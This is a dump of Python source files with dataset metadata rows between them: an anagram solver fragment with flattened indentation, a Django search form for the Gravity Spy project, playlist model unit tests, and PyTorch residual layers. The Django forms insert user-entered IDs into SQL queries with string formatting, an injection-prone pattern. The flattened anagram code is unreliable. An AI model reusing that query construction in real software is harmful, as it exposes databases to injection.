  of the input word made of at most n words; otherwise it only runs the
  computation and stores the number of solutions found in the global
  variable nb_sols."""
global nb_sols
def gen_anagram(anagram, possible_words, limit=0, rec=0):
    """The generator doing the real work: recursively produces the anagrams."""
for word in possible_words:
x = check_word(anagram, word)
if x == True:
yield [word]
elif x and rec < limit:
for y in gen_anagram(x, possible_words, limit-1, rec+1):
if len(y) < limit:
yield [word] + y
anagram = ''.join(sorted(mon_mot))
possible_words = set()
lexique = {}
for word in dictionary:
word = word.upper().strip()
key = ''.join(sorted(word))
    # build the lexicon
if key in lexique:
lexique[key].append(word)
else:
lexique[key] = [word]
    # keep pruning branches
tmp = list("".join(anagram.split()))
skip = False
for c in word:
if c not in anagram:
skip = True
continue
else:
try:
tmp.remove(c)
        except ValueError:
skip = True
continue
if skip:
continue
else:
      possible_words.add(key)  # store keys rather than words: smaller set, faster lookups
anagram = [x for x in anagram.strip() if x != ' ']
start = time()
res = set()
for x in gen_anagram(anagram, possible_words, nb_mots):
res.add(tuple(sorted(x)))
c = 0
for s in res:
t = 1
for k in s:
t *= len(lexique[k])
c += t
start = time() - start
nb_sols = c
if DEBUG:
    print("number of possible combinations:", c)
    print("found in:", start)
    print('=' * 30)
    print("solutions:")
def perms(L, sol=[]):
    "Rebuilds all the anagrams from the keys chosen by gen_anagram"
if len(L) == 1:
for v in lexique[L[0]]:
sol.append(v)
print(" ".join(sol))
sol.remove(v)
else:
k = L[-1]
for k in lexique[k]:
sol.append(k)
perms(L[:-1], sol)
sol.remove(k)
for L in res:
L = list(L)
if DEBUG:
      perms(L)  # print the solutions
def fun_nb_sols():
global nb_sols
return nb_sols
if __name__ == "__main__":
  DEBUG = True  # show off the fancy results! :D
else:  # don't print everything during unit tests
DEBUG = False
| 26.836283 | 83 | 0.504864 | 753 | 6,065 | 4.001328 | 0.208499 | 0.051776 | 0.019914 | 0.03319 | 0.808165 | 0.808165 | 0.800531 | 0.800531 | 0.780617 | 0.780617 | 0 | 0.006352 | 0.402968 | 6,065 | 225 | 84 | 26.955556 | 0.825739 | 0.188953 | 0 | 0.829412 | 0 | 0 | 0.059896 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047059 | false | 0 | 0.017647 | 0 | 0.094118 | 0.064706 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ded6a7f99719df9dd630205294bb2dad7c36032 | 10,726 | py | Python | gravityspytools/search/forms.py | Gravity-Spy/gravityspytools | 23ef83e36ed934f7c39440bf43f4d5c7b7b4abb0 | [
"BSD-3-Clause"
] | 4 | 2019-03-11T12:32:24.000Z | 2020-12-01T06:31:39.000Z | gravityspytools/search/forms.py | johnwick211/gravityspytools | 23ef83e36ed934f7c39440bf43f4d5c7b7b4abb0 | [
"BSD-3-Clause"
] | 19 | 2018-01-29T21:28:39.000Z | 2020-07-14T18:38:23.000Z | gravityspytools/search/forms.py | johnwick211/gravityspytools | 23ef83e36ed934f7c39440bf43f4d5c7b7b4abb0 | [
"BSD-3-Clause"
] | 4 | 2018-02-02T16:47:16.000Z | 2020-12-01T06:31:49.000Z | from django import forms
from gwpy.table import EventTable
def get_imageid_json(name=''):
return EventTable.fetch('gravityspy', 'similarity_index_o3 WHERE \"gravityspy_id\" ~ \'{0}\' LIMIT 20'.format(name), columns=["gravityspy_id"], host='gravityspyplus.ciera.northwestern.edu').to_pandas().rename(columns={'gravityspy_id': 'value'}).to_json(orient='records')
def get_zooid_json(name=''):
return EventTable.fetch('gravityspy', 'similarity_index_o3 WHERE CAST(links_subjects AS TEXT) ~ \'{0}\' LIMIT 20'.format(name), columns=["links_subjects"], host='gravityspyplus.ciera.northwestern.edu').to_pandas().astype(str).rename(columns={'links_subjects': 'value'}).to_json(orient='records')
def get_gpstimes_json(name=''):
return EventTable.fetch('gravityspy', 'similarity_index_o3 WHERE CAST(\"event_time\" AS TEXT) ~ \'{0}\' LIMIT 20'.format(name), columns=["event_time"], host='gravityspyplus.ciera.northwestern.edu').to_pandas().astype(str).rename(columns={'event_time': 'value'}).to_json(orient='records')
class SearchForm(forms.Form):
SINGLEVIEW = 'similarityindex'
MULTIVIEW = 'similarity_index_o3'
DATABASE_CHOICES = (
(MULTIVIEW, 'Multiview Model'),
(SINGLEVIEW, 'Single View Model'),
)
H1 = "\'H1\'"
H1L1 = "\'H1\', \'L1\'"
H1L1V1 = "\'H1\', \'L1\', \'V1\'"
L1 = "\'L1\'"
L1V1 = "\'L1\', \'V1\'"
V1 = "\'V1\'"
IFO_CHOICES = (
(H1L1, 'H1 L1'),
(H1, 'H1'),
(H1L1V1, 'H1 L1 V1'),
(L1, 'L1'),
(L1V1, 'L1 V1'),
(V1, 'V1'),
)
ALL = "event_time BETWEEN 1126400000 AND 1584057618"
O1 = "event_time BETWEEN 1126400000 AND 1137250000"
ER10 = "event_time BETWEEN 1161907217 AND 1164499217"
O2a = "event_time BETWEEN 1164499217 AND 1219276818"
ER13 = "event_time BETWEEN 1228838418 AND 1229176818"
ER14 = "event_time BETWEEN 1235750418 AND 1238112018"
O3a = "event_time BETWEEN 1238166018 AND 1254009618"
O3b = "event_time BETWEEN 1256655642 AND 1272326418"
O3 = "event_time BETWEEN 1238166018 AND 1272326418"
ERAS = (
(ALL, 'ALL'),
(O1, 'O1'),
(ER10, 'ER10'),
(O2a, 'O2a'),
(ER13, 'ER13'),
(ER14, 'ER14'),
(O3a, 'O3a'),
(O3b, 'O3b'),
(O3, 'O3'),
)
database = forms.ChoiceField(choices=DATABASE_CHOICES,)
howmany = forms.IntegerField(label='How many similar images would you like to return', max_value=200, min_value=1)
    zooid = forms.CharField(label='This is the Zooniverse assigned random ID of the image (an integer value)', max_length=10, required=False)
imageid = forms.CharField(label='The GravitySpy uniqueid (this is the 10 character hash that uniquely identifies all gravity spy images)', max_length=10, required=False)
ifo = forms.ChoiceField(choices=IFO_CHOICES,)
era = forms.ChoiceField(choices=ERAS,)
def clean(self):
cleaned_data = super(SearchForm, self).clean()
zooid = cleaned_data.get('zooid')
imageid = cleaned_data.get('imageid')
ifos = str(cleaned_data.get('ifo'))
database = cleaned_data.get('database')
era = cleaned_data.get('era')
if zooid and imageid:
raise forms.ValidationError("Please fill out "
"only one of the zooid "
"or gravityspy id fields"
)
elif (not zooid) and (not imageid):
raise forms.ValidationError("Please fill out "
"one but not both of the zooid "
"and gravityspy id fields"
)
if zooid and not imageid:
if not EventTable.fetch('gravityspy', 'nonanalysisreadyids WHERE links_subjects = {0}'.format(zooid), host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This zooID is one of a handful of glitches that were mistakenly uploaded, despite being glitches"
"occuring while the detector was not in a state to be taking quality data "
"(i.e. people may have been working on the instrument at the time."
)
if EventTable.fetch('gravityspy', '{0} WHERE links_subjects = {1}'.format(database, zooid), columns=['links_subjects'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("zooid does not exist")
elif EventTable.fetch('gravityspy', '{0} WHERE links_subjects = {1} AND ifo IN ({2})'.format(database, zooid, ifos), columns=['links_subjects'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This image is not from one of the interferometers you selected"
)
if imageid and not zooid:
if not EventTable.fetch('gravityspy', 'nonanalysisreadyids WHERE \"gravityspy_id\" = \'{0}\''.format(imageid), host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This gravityspy_id is one of a handful of glitches that were mistakenly uploaded, despite being glitches"
"occuring while the detector was not in a state to be taking quality data "
"(i.e. people may have been working on the instrument at the time."
)
if EventTable.fetch('gravityspy', '{0} WHERE \"gravityspy_id\" = \'{1}\''.format(database, imageid), columns=['gravityspy_id'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("uniqueid does not exist")
elif EventTable.fetch('gravityspy', '{0} WHERE \"gravityspy_id\" = \'{1}\' AND ifo IN ({2})'.format(database, imageid, ifos), columns=['gravityspy_id'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("This image is not from one of the interferometers you selected"
)
def clean_zooid(self):
zooid = self.cleaned_data['zooid']
if not zooid:
zooid = False
return zooid
def clean_imageid(self):
imageid = self.cleaned_data['imageid']
if not imageid:
imageid = False
return imageid
class LIGOSearchForm(forms.Form):
howmany = forms.IntegerField(label='How many similar images would you like to return', max_value=200, min_value=1)
    zooid = forms.CharField(label='This is the Zooniverse assigned random ID of the image (an integer value)', max_length=10, required=False)
imageid = forms.CharField(label='The GravitySpy uniqueid (this is the 10 character hash that uniquely identifies all gravity spy images)', max_length=10, required=False)
    gpstime = forms.CharField(label='Supply a gps time of an excess noise feature', required=False)
SINGLEVIEW = 'similarityindex'
MULTIVIEW = 'similarity_index_o3'
DATABASE_CHOICES = (
(MULTIVIEW, 'Multiview Model'),
(SINGLEVIEW, 'Single View Model'),
)
H1 = "\'H1\'"
H1L1 = "\'H1\', \'L1\'"
H1L1V1 = "\'H1\', \'L1\', \'V1\'"
L1 = "\'L1\'"
L1V1 = "\'L1\', \'V1\'"
V1 = "\'V1\'"
IFO_CHOICES = (
(H1L1, 'H1 L1'),
(H1, 'H1'),
(H1L1V1, 'H1 L1 V1'),
(L1, 'L1'),
(L1V1, 'L1 V1'),
(V1, 'V1'),
)
ALL = "event_time BETWEEN 1126400000 AND 1584057618"
O1 = "event_time BETWEEN 1126400000 AND 1137250000"
ER10 = "event_time BETWEEN 1161907217 AND 1164499217"
O2a = "event_time BETWEEN 1164499217 AND 1219276818"
ER13 = "event_time BETWEEN 1228838418 AND 1229176818"
ER14 = "event_time BETWEEN 1235750418 AND 1238112018"
O3a = "event_time BETWEEN 1238166018 AND 1254009618"
O3b = "event_time BETWEEN 1256655642 AND 1272326418"
O3 = "event_time BETWEEN 1238166018 AND 1272326418"
ERAS = (
(ALL, 'ALL'),
(O1, 'O1'),
(ER10, 'ER10'),
(O2a, 'O2a'),
(ER13, 'ER13'),
(ER14, 'ER14'),
(O3a, 'O3a'),
(O3b, 'O3b'),
(O3, 'O3'),
)
ifo = forms.ChoiceField(choices=IFO_CHOICES,)
database = forms.ChoiceField(choices=DATABASE_CHOICES,)
era = forms.ChoiceField(choices=ERAS,)
def clean(self):
cleaned_data = super(LIGOSearchForm, self).clean()
zooid = cleaned_data.get('zooid')
imageid = cleaned_data.get('imageid')
gpstime = cleaned_data.get('gpstime')
ifos = cleaned_data.get('ifo')
database = cleaned_data.get('database')
if (zooid and imageid and gpstime) or (zooid and imageid) or \
(zooid and gpstime) or (gpstime and imageid):
raise forms.ValidationError("Please fill out "
"only one of the zooid "
"or gravityspy id fields"
)
elif (not zooid) and (not imageid) and (not gpstime):
raise forms.ValidationError("Please fill out "
"one but not both of the zooid "
"and gravityspy id fields"
)
if zooid and not imageid and not gpstime:
if EventTable.fetch('gravityspy', '{0} WHERE links_subjects = {1}'.format(database, zooid), columns=['links_subjects'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("zooid does not exist"
)
if imageid and not zooid and not gpstime:
if EventTable.fetch('gravityspy', '{0} WHERE \"gravityspy_id\" = \'{1}\''.format(database, imageid), columns=['gravityspy_id'], host='gravityspyplus.ciera.northwestern.edu').to_pandas().empty:
raise forms.ValidationError("uniqueid does not exist"
)
def clean_zooid(self):
zooid = self.cleaned_data['zooid']
if not zooid:
zooid = False
return zooid
def clean_imageid(self):
imageid = self.cleaned_data['imageid']
if not imageid:
imageid = False
return imageid
def clean_gpstime(self):
gpstime = self.cleaned_data['gpstime']
if not gpstime:
gpstime = False
return gpstime
| 44.878661 | 299 | 0.592765 | 1,200 | 10,726 | 5.206667 | 0.158333 | 0.03025 | 0.046095 | 0.06162 | 0.899808 | 0.889565 | 0.862676 | 0.826344 | 0.81322 | 0.782811 | 0 | 0.072689 | 0.286873 | 10,726 | 238 | 300 | 45.067227 | 0.74415 | 0 | 0 | 0.704663 | 0 | 0 | 0.363509 | 0.037945 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051813 | false | 0 | 0.010363 | 0.015544 | 0.388601 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
308d8d5d2fc129945b3f796fd802472fab7e4d9e | 10,360 | py | Python | test/test_playlist_model.py | ooyamatakehisa/bpm-searcher | 0e606c1fa11da8ebcb7dc7bfbb4f3ac2556f6863 | [
"MIT"
] | null | null | null | test/test_playlist_model.py | ooyamatakehisa/bpm-searcher | 0e606c1fa11da8ebcb7dc7bfbb4f3ac2556f6863 | [
"MIT"
] | 30 | 2021-08-25T16:33:32.000Z | 2021-12-13T06:49:38.000Z | test/test_playlist_model.py | ooyamatakehisa/bpm-searcher | 0e606c1fa11da8ebcb7dc7bfbb4f3ac2556f6863 | [
"MIT"
] | null | null | null | from datetime import datetime
import unittest
from domain.model.playlist import Playlist, PlaylistInfo
from domain.model.track import PlaylistTrack, Track
class TestPlaylistInteractor(unittest.TestCase):
def test_delete1(self) -> None:
"""Testcase where the playlist has 2 tracks and delete first track
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
playlist_track2 = PlaylistTrack(
id="playlist_track_id2",
order=2,
track=Track(
spotify_id="spotify_id2",
song_name="song_name2",
artist="artist2",
album_name="album_name2",
bpm=222.2,
danceability=222.2,
energy=222.2,
image_url="image_url2",
key=2,
mode=2,
preview_url="preview_url2",
),
created_at=date_time,
updated_at=date_time,
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=2,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
playlist_track2,
],
)
new_playlist = playlist.delete(playlist_track1)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 1)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url2")
self.assertEqual(len(new_playlist.playlist_tracks), 1)
self.assertEqual(new_playlist.playlist_tracks[0].id, "playlist_track_id2")
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
def test_delete2(self) -> None:
"""Testcase where the playlist has 2 tracks and delete second track
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
playlist_track2 = PlaylistTrack(
id="playlist_track_id2",
order=2,
track=Track(
spotify_id="spotify_id2",
song_name="song_name2",
artist="artist2",
album_name="album_name2",
bpm=222.2,
danceability=222.2,
energy=222.2,
image_url="image_url2",
key=2,
mode=2,
preview_url="preview_url2",
),
created_at=date_time,
updated_at=date_time,
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=2,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
playlist_track2,
],
)
new_playlist = playlist.delete(playlist_track2)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 1)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url1")
self.assertEqual(len(new_playlist.playlist_tracks), 1)
self.assertEqual(new_playlist.playlist_tracks[0].id, "playlist_track_id1")
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
def test_delete3(self) -> None:
"""Testcase where the playlist has 1 tracks and delete it
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=1,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
],
)
new_playlist = playlist.delete(playlist_track1)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 0)
self.assertEqual(new_playlist.playlist_info.image_url, None)
self.assertEqual(len(new_playlist.playlist_tracks), 0)
def test_add1(self) -> None:
"""Testcase where the playlist has 1 track and add a new track
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
new_track = Track(
spotify_id="spotify_id2",
song_name="song_name2",
artist="artist2",
album_name="album_name2",
bpm=222.2,
danceability=222.2,
energy=222.2,
image_url="image_url2",
key=2,
mode=2,
preview_url="preview_url2",
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=1,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
],
)
new_playlist = playlist.add(new_track)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 2)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url1")
self.assertEqual(len(new_playlist.playlist_tracks), 2)
self.assertEqual(new_playlist.playlist_tracks[0].id, "playlist_track_id1")
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
self.assertEqual(new_playlist.playlist_tracks[1].order, 2)
def test_add2(self) -> None:
"""Testcase where the playlist has no track and add a new track
"""
playlist_id = "playlist_id1"
date_time = datetime.now()
new_track = Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=0,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[],
)
new_playlist = playlist.add(new_track)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 1)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url1")
self.assertEqual(len(new_playlist.playlist_tracks), 1)
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
if __name__ == '__main__':
unittest.main()
| 34.533333 | 82 | 0.519981 | 1,028 | 10,360 | 4.933852 | 0.077821 | 0.135647 | 0.12362 | 0.117902 | 0.94026 | 0.93612 | 0.934937 | 0.911278 | 0.888013 | 0.88683 | 0 | 0.03948 | 0.391216 | 10,360 | 299 | 83 | 34.648829 | 0.764706 | 0.032819 | 0 | 0.868613 | 0 | 0 | 0.087932 | 0 | 0 | 0 | 0 | 0 | 0.10219 | 1 | 0.018248 | false | 0 | 0.014599 | 0 | 0.036496 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30c7089ad265416530d1f3673318afaa4d285808 | 6,573 | py | Python | senseis/torch_modules/residual_layer.py | armandli/ReconChessRL | 3f3f018fd347ee17452ef6ad725d82f2f11678c6 | [
"MIT"
] | 4 | 2021-08-19T14:06:01.000Z | 2021-12-24T06:34:23.000Z | senseis/torch_modules/residual_layer.py | captainzhu123/ReconChessRL | 6d0de7acd7aeba0ad767e29c807ee0e6f30d95fb | [
"MIT"
] | 2 | 2021-09-18T08:34:01.000Z | 2022-03-23T07:06:05.000Z | senseis/torch_modules/residual_layer.py | captainzhu123/ReconChessRL | 6d0de7acd7aeba0ad767e29c807ee0e6f30d95fb | [
"MIT"
] | 1 | 2021-09-18T08:30:23.000Z | 2021-09-18T08:30:23.000Z | import torch.nn as nn
def downsampling1D(in_sz, out_sz, norm_layer):
return nn.Sequential(
nn.Linear(in_sz, out_sz),
norm_layer(out_sz)
)
def downsampling2DV1(in_c, out_c, ksz, norm_layer):
  # note: ksz is unused here; the shortcut always applies a 1x1 convolution
return nn.Sequential(
nn.Conv2d(in_c, out_c, 1, bias=False),
norm_layer(out_c)
)
def downsampling2DV2(in_c, out_c, stride, norm_layer):
return nn.Sequential(
nn.Conv2d(in_c, out_c, 1, stride=stride, bias=False),
norm_layer(out_c),
)
class ResidualLayer1DV1(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, downsample=None):
super(ResidualLayer1DV1, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(out_sz)
self.b2 = norm_layer(out_sz)
self.downsample = downsample
def forward(self, x):
s = x
x = self.fc1(x)
x = self.b1(x)
x = self.a1(x)
x = self.fc2(x)
x = self.b2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
x = self.a2(x)
return x
class ResidualLayer1DV2(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, downsample=None):
super(ResidualLayer1DV2, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.downsample = downsample
def forward(self, x):
s = x
x = self.b1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# Add in dropout for 1D Residual Layer
class ResidualLayer1DV3(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, p, downsample=None):
super(ResidualLayer1DV3, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.d1 = nn.Dropout(p=p)
self.d2 = nn.Dropout(p=p)
self.downsample = downsample
def forward(self, x):
s = x
x = self.b1(x)
x = self.d1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
x = self.d2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# Automatic downsample based on in_sz != out_sz
class ResidualLayer1DV4(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, p):
super(ResidualLayer1DV4, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.d1 = nn.Dropout(p=p)
self.d2 = nn.Dropout(p=p)
self.downsample = None
if in_sz != out_sz:
self.downsample = downsampling1D(in_sz, out_sz, norm_layer)
def forward(self, x):
s = x
x = self.b1(x)
x = self.d1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
x = self.d2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# dropout is optional
class ResidualLayer1DV5(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, p=1.):
super(ResidualLayer1DV5, self).__init__()
self.p = p
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.d1 = nn.Dropout(p=p)
self.d2 = nn.Dropout(p=p)
self.downsample = None
if in_sz != out_sz:
self.downsample = downsampling1D(in_sz, out_sz, norm_layer)
def forward(self, x):
s = x
x = self.b1(x)
if self.p < 1.:
x = self.d1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
if self.p < 1.:
x = self.d2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
class ResidualLayer2DV1(nn.Module):
def __init__(self, in_c, out_c, ksz, act_layer, norm_layer, downsample=None):
super(ResidualLayer2DV1, self).__init__()
self.c1 = nn.Conv2d(in_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.c2 = nn.Conv2d(out_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(out_c)
self.b2 = norm_layer(out_c)
self.downsample = downsample
def forward(self, x):
s = x
x = self.c1(x)
x = self.b1(x)
x = self.a1(x)
x = self.c2(x)
x = self.b2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
x = self.a2(x)
return x
class ResidualLayer2DV2(nn.Module):
def __init__(self, in_c, out_c, ksz, act_layer, norm_layer, downsample=None):
super(ResidualLayer2DV2, self).__init__()
self.c1 = nn.Conv2d(in_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.c2 = nn.Conv2d(out_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_c)
self.b2 = norm_layer(out_c)
self.downsample = downsample
def forward(self, x):
s = x
x = self.b1(x)
x = self.a1(x)
x = self.c1(x)
x = self.b2(x)
x = self.a2(x)
x = self.c2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# automatic downsample based on whether in_c != out_c and stride > 1
class ResidualLayer2DV3(nn.Module):
def __init__(self, in_c, out_c, ksz, act_layer, norm_layer, stride=1):
super(ResidualLayer2DV3, self).__init__()
self.c1 = nn.Conv2d(in_c, out_c, ksz, stride=stride, padding=int((ksz - 1) / 2), bias=False)
self.c2 = nn.Conv2d(out_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_c)
self.b2 = norm_layer(out_c)
self.downsample = None
if in_c != out_c or stride > 1:
self.downsample = downsampling2DV2(in_c, out_c, stride, norm_layer)
def forward(self, x):
s = x
x = self.b1(x)
x = self.a1(x)
x = self.c1(x)
x = self.b2(x)
x = self.a2(x)
x = self.c2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x | 27.851695 | 96 | 0.617678 | 1,118 | 6,573 | 3.438283 | 0.063506 | 0.030177 | 0.078044 | 0.039802 | 0.860302 | 0.854318 | 0.831426 | 0.817638 | 0.802549 | 0.802549 | 0 | 0.035707 | 0.241594 | 6,573 | 236 | 97 | 27.851695 | 0.735406 | 0.025711 | 0 | 0.816901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089202 | false | 0 | 0.004695 | 0.014085 | 0.183099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
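All of the layer variants in residual_layer.py share one skip-connection pattern: run the input through a transform branch, optionally project the shortcut when input and output sizes differ, then add the two. Stripped of PyTorch, the arithmetic reduces to the following illustrative sketch (plain Python; `transform` and `downsample` are hypothetical stand-ins for the module's fc/conv stacks, not part of the original file):

```python
def residual_step(x, transform, downsample=None):
    """Apply a transform branch and add the (optionally projected) shortcut."""
    shortcut = downsample(x) if downsample is not None else x
    return [t + s for t, s in zip(transform(x), shortcut)]

# Identity shortcut: y = f(x) + x
doubled = residual_step([1.0, 2.0], lambda v: [2.0 * a for a in v])
assert doubled == [3.0, 6.0]

# Projected shortcut when shapes differ (a toy length-1 projection,
# playing the role of downsampling1D / downsampling2DV2)
projected = residual_step([1.0, 2.0],
                          lambda v: [sum(v)],
                          downsample=lambda v: [sum(v) / len(v)])
assert projected == [4.5]
```

This is why the automatic variants (V4, 2DV3) only build a `downsample` module when `in_sz != out_sz` (or the stride changes the spatial size): otherwise the identity shortcut already matches.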
